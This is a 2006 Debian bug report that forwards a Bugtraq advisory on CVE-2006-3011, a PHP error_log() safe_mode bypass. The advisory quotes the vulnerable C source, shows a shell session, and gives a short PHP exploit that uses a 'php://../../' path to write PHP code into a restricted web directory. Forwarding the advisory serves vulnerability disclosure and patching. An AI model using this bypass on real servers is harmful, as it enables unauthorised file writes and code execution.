[php-maint] Bug#375643: SECURITY: CVE-2006-3011: error_log() Safe
Mode Bypass PHP 5.1.4 and 4.4.2
Christian Hammers
ch at debian.org
Tue Jun 27 11:16:47 UTC 2006
Package: php4
Version: 4.4.2
Severity: grave
Justification: security
Hello
The following came through bugtraq, please check if we're affected.
bye,
-christian-
On Sun, Jun 25, 2006 at 11:11:34PM -0000, cxib at securityreason.com wrote:
> [error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
>
> Author: Maksymilian Arciemowicz (cXIb8O3)
> Date:
> -Written: 10.6.2006
> -Public: 26.06.2006
> from SECURITYREASON.COM
> CVE-2006-3011
>
> --- 0.Description ---
> PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
>
> A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
> error_log -- Send an error message somewhere.
>
> --- 1. error_log() Safe Mode Bypass ---
> error_log() function send to email, file or display your error message. You can send error messages per mail or write into files. Issue is very simple. error_log() check safe_mode and open_basedir in stream function. But isn't allowed use URL. And problem exists in incorrect filename.
>
> PHP5:
> -2013-2050---
> PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
> {
> php_stream *stream = NULL;
>
> switch (opt_err) {
>
> case 1: /*send an email */
> {
> #if HAVE_SENDMAIL
> if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
> return FAILURE;
> }
> #else
> php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
> return FAILURE;
> #endif
> }
> break;
>
> case 2: /*send to an address */
> php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
> return FAILURE;
> break;
>
> case 3: /*save to a file */
> stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
> if (!stream)
> return FAILURE;
> php_stream_write(stream, message, strlen(message));
> php_stream_close(stream);
> break;
>
> default:
> php_log_err(message TSRMLS_CC);
> break;
> }
> return SUCCESS;
> }
> -2013-2050---
>
> Let's see to option 3.
>
> -2038 line---
> stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
> -2038 line---
>
> Option "a", writte to file error or if file dosen't exists, create new file.
> Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL".
> IGNORE_URL turn off safe_mode if you use "prefix://../../".
>
> -Example---
> cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'
>
> Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1
>
> Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
> cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
> cxib# ls -la /www/temp/sr.php
> -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
> cxib#
> -Example---
>
> --- 2. Exploit ---
> <?php
> $file=""; # FILENAME
> error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
> ?>
>
>
> --- 3. How to fix ---
> No response from PHP Team. We have reported this bug in 11.06.2006
>
> --- 4. Greets ---
>
> For: sp3x
> and
> p_e_a, l3x, pi3, eax, Infospec, gKPc8O3
>
> --- 5. Contact ---
> Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
> Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
> GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
> SecurityReason.Com
>
--
Christian Hammers WESTEND GmbH | Internet-Business-Provider
Technik CISCO Systems Partner - Authorized Reseller
Lütticher Straße 10 Tel 0241/701333-11
ch at westend.com D-52064 Aachen Fax 0241/911879
More information about the pkg-php-maint
mailing list